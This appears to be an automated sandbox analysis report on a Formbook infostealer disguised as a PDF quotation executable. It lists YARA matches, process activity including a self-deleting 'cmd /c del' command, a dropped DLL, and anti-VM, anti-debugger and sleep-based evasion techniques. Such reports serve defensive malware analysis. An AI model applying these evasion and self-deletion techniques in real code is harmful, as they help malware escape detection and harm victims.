Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@17/8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004041E5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar, 0_2_004020A6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsp8287.tmp Jump to behavior
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Virustotal: Detection: 35%
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File read: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' Jump to behavior
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041D067 push ss; ret 2_2_0041D06D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004152DB push esi; rep ret 2_2_004152EA
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0040AB63 push esi; iretd 2_2_0040AB67
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B3FB push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B45C push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00414DEF push ss; iretd 2_2_00414DF0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041C597 push esi; ret 2_2_0041C599
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041CE86 push esi; iretd 2_2_0041CE89
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00414F7F push FFFFFF97h; iretd 2_2_00414FBC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A1D0D1 push ecx; ret 2_2_00A1D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047ED0D1 push ecx; ret 7_2_047ED0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071D067 push ss; ret 7_2_0071D06D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007152DB push esi; rep ret 7_2_007152EA
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0070AB63 push esi; iretd 7_2_0070AB67
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B3F2 push eax; ret 7_2_0071B3F8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B3FB push eax; ret 7_2_0071B462
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B3A5 push eax; ret 7_2_0071B3F8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B45C push eax; ret 7_2_0071B462
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00714DEF push ss; iretd 7_2_00714DF0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071C597 push esi; ret 7_2_0071C599
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071CE86 push esi; iretd 7_2_0071CE89
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00714F7F push FFFFFF97h; iretd 7_2_00714FBC

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll Jump to dropped file
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 000000000070896E second address: 0000000000708974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6872 Thread sleep time: -65000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6776 Thread sleep time: -52000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC
Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000002.919593187.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.665596378.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.673241893.000000000A9CA000.00000004.00000001.sdmp Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&|
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.671622692.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirXXH
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00409B10 LdrLoadDll, 2_2_00409B10
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 0_2_72AD1000
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_026C163F mov eax, dword ptr fs:[00000030h] 0_2_026C163F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_026C1857 mov eax, dword ptr fs:[00000030h] 0_2_026C1857
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h] 2_2_00A090AF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h] 2_2_009C9080
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h] 2_2_00A43884
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h] 2_2_00A43884
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C58EC mov eax, dword ptr fs:[00000030h] 2_2_009C58EC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h] 2_2_009C40E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h] 2_2_009C40E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h] 2_2_009C40E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h] 2_2_00A94015
